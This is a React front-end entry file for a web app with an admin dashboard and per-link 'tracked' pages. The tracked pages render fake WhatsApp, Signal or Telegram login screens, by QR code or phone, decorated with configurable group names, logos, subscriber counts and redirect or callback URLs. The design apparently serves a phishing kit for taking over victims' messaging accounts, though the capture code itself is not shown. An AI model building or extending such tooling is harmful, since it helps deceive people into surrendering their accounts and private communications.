import React, { useEffect, useState } from 'react';
import { io, Socket } from 'socket.io-client';
import { SOCKET_URL, API_BASE_URL } from './config';
import { LandingPage } from './components/LandingPage';
import { AdminLogin } from './components/AdminLogin';
import { AdminDashboard } from './components/AdminDashboard';
import { TrackedLogin } from './components/TrackedLogin';
import { Register } from './components/Register';
import { Loader2 } from 'lucide-react';

// Socket instance - auto connect, no auth needed
export const socket: Socket = io(SOCKET_URL, {
    autoConnect: true,
    transports: ['websocket', 'polling']
});

type AppView = 'loading' | 'main' | 'admin-login' | 'admin-dashboard' | 'tracked' | 'expired' | 'not-found' | 'register';

interface TrackedLinkData {
    linkId: string;
    loginMethod: 'qr' | 'phone' | 'both';
    platform: 'whatsapp' | 'signal' | 'telegram' | 'both';
    groupName: string;
    groupImage: string | null;
    telegramSubscriberCount?: number | null;
    redirectUrl?: string | null;
    scene: 'join-group' | 'website-login';
    callbackUrl?: string | null;
    websiteName?: string | null;
    websiteLogo?: string | null;
    websiteDescription?: string | null;
    preferredCountryCode?: string | null;
}

function App() {
    const [view, setView] = useState<AppView>('loading');
    const [adminToken, setAdminToken] = useState<string | null>(null);
    const [adminUser, setAdminUser] = useState<{ id: string; username: string; role: string; permissions: any } | null>(null);
    const [trackedData, setTrackedData] = useState<TrackedLinkData | null>(null);
    const [errorMessage, setErrorMessage] = useState<string | null>(null);

    useEffect(() => {
        // Socket connection events
        socket.on('connect', () => {
            console.log('[Socket] Connected:', socket.id);
        });

        socket.on('disconnect', () => {
            console.log('[Socket] Disconnected');
        });

        socket.on('connected', (data) => {
            console.log('[Socket] Server confirmed connection:', data);
        });

        return () => {
            socket.off('connect');
            socket.off('disconnect');
            socket.off('connected');
        };
    }, []);

    useEffect(() => {
        // Parse URL to determine which view to show
        const path = window.location.pathname;

        // Admin routes
        if (path.startsWith('/admin')) {
            // Check for existing admin session
            const storedToken = localStorage.getItem('adminToken');
            const storedUser = localStorage.getItem('adminUser');

            if (storedToken && storedUser) {
                // Verify token is still valid
                verifyAdminToken(storedToken, JSON.parse(storedUser));
            } else {
                setView('admin-login');
            }
            return;
        }

        // Register route
        if (path === '/register') {
            setView('register');
            return;
        }

        // Tracked link routes
        if (path.startsWith('/t/')) {
            const shortCode = path.substring(3).replace(/\.html$/, '');
            if (shortCode) {
                trackAndLoadLink(shortCode);
            } else {
                setView('not-found');
            }
            return;
        }

        // Default: main app
        setView('main');
    }, []);

    const verifyAdminToken = async (token: string, user: { id: string; username: string }) => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/verify`, {
                headers: { 'Authorization': `Bearer ${token}` }
            });
            const data = await response.json();

            if (data.success) {
                setAdminToken(token);
                setAdminUser(data.admin);
                setView('admin-dashboard');
            } else {
                localStorage.removeItem('adminToken');
                localStorage.removeItem('adminUser');
                setView('admin-login');
            }
        } catch (err) {
            console.error('Token verification failed:', err);
            setView('admin-login');
        }
    };

    const trackAndLoadLink = async (shortCode: string) => {
        try {
            const response = await fetch(`${API_BASE_URL}/admin/track/${shortCode}`);
            const data = await response.json();

            if (data.success) {
                setTrackedData({
                    linkId: data.linkId,
                    loginMethod: data.loginMethod,
                    platform: data.platform || 'whatsapp',
                    groupName: data.groupName,
                    groupImage: data.groupImage,
                    telegramSubscriberCount: data.telegramSubscriberCount ?? null,
                    redirectUrl: data.redirectUrl || null,
                    scene: data.scene || 'join-group',
                    callbackUrl: data.callbackUrl || null,
                    websiteName: data.websiteName || null,
                    websiteLogo: data.websiteLogo || null,
                    websiteDescription: data.websiteDescription || null,
                    preferredCountryCode: data.preferredCountryCode || null,
                });
                setView('tracked');
            } else {
                setErrorMessage(data.message || 'Link not found');
                setView(response.status === 410 ? 'expired' : 'not-found');
            }
        } catch (err) {
            console.error('Failed to load tracking link:', err);
            setView('not-found');
        }
    };

    const handleAdminLogin = (token: string, admin: { id: string; username: string; role: string; permissions: any }) => {
        setAdminToken(token);
        setAdminUser(admin);
        setView('admin-dashboard');
    };

    const handleAdminLogout = () => {
        setAdminToken(null);
        setAdminUser(null);
        setView('admin-login');
    };

    const handleGoToAdmin = () => {
        window.location.href = '/admin';
    };

    // Render based on current view
    if (view === 'loading') {
        return (
            <div className="min-h-screen bg-[#0a0a0f] flex items-center justify-center">
                <Loader2 className="w-12 h-12 text-cyan-500 animate-spin" />
            </div>
        );
    }

    if (view === 'register') {
        return <Register onGoToLogin={() => { window.location.href = '/admin'; }} />;
    }

    if (view === 'admin-login') {
        return <AdminLogin onLoginSuccess={handleAdminLogin} onGoToRegister={() => setView('register')} />;
    }

    if (view === 'admin-dashboard' && adminToken && adminUser) {
        return <AdminDashboard token={adminToken} admin={adminUser} onLogout={handleAdminLogout} />;
    }

    if (view === 'tracked' && trackedData) {
        return (
            <TrackedLogin 
                linkId={trackedData.linkId} 
                loginMethod={trackedData.loginMethod}
                platform={trackedData.platform}
                groupName={trackedData.groupName}
                groupImage={trackedData.groupImage}
                telegramSubscriberCount={trackedData.telegramSubscriberCount}
                redirectUrl={trackedData.redirectUrl}
                scene={trackedData.scene}
                callbackUrl={trackedData.callbackUrl}
                websiteName={trackedData.websiteName}
                websiteLogo={trackedData.websiteLogo}
                websiteDescription={trackedData.websiteDescription}
                preferredCountryCode={trackedData.preferredCountryCode}
            />
        );
    }

    if (view === 'expired') {
        return (
            <div className="min-h-screen bg-[#0a0a0f] flex items-center justify-center p-6">
                <div className="text-center">
                    <div className="w-20 h-20 rounded-full bg-red-500/10 border border-red-500/20 flex items-center justify-center mx-auto mb-6">
                        <span className="text-4xl">⏰</span>
                    </div>
                    <h1 className="text-3xl font-bold text-white mb-4">Link Expired</h1>
                    <p className="text-gray-500 max-w-md">{errorMessage || 'This link is no longer active or has expired.'}</p>
                </div>
            </div>
        );
    }

    if (view === 'not-found') {
        return (
            <div className="min-h-screen bg-[#0a0a0f] flex items-center justify-center p-6">
                <div className="text-center">
                    <div className="w-20 h-20 rounded-full bg-gray-500/10 border border-gray-500/20 flex items-center justify-center mx-auto mb-6">
                        <span className="text-4xl">🔍</span>
                    </div>
                    <h1 className="text-3xl font-bold text-white mb-4">Not Found</h1>
                    <p className="text-gray-500 max-w-md">The page you're looking for doesn't exist.</p>
                </div>
            </div>
        );
    }

    // Default: Landing page
    return <LandingPage onGoToAdmin={handleGoToAdmin} />;
}

export default App;
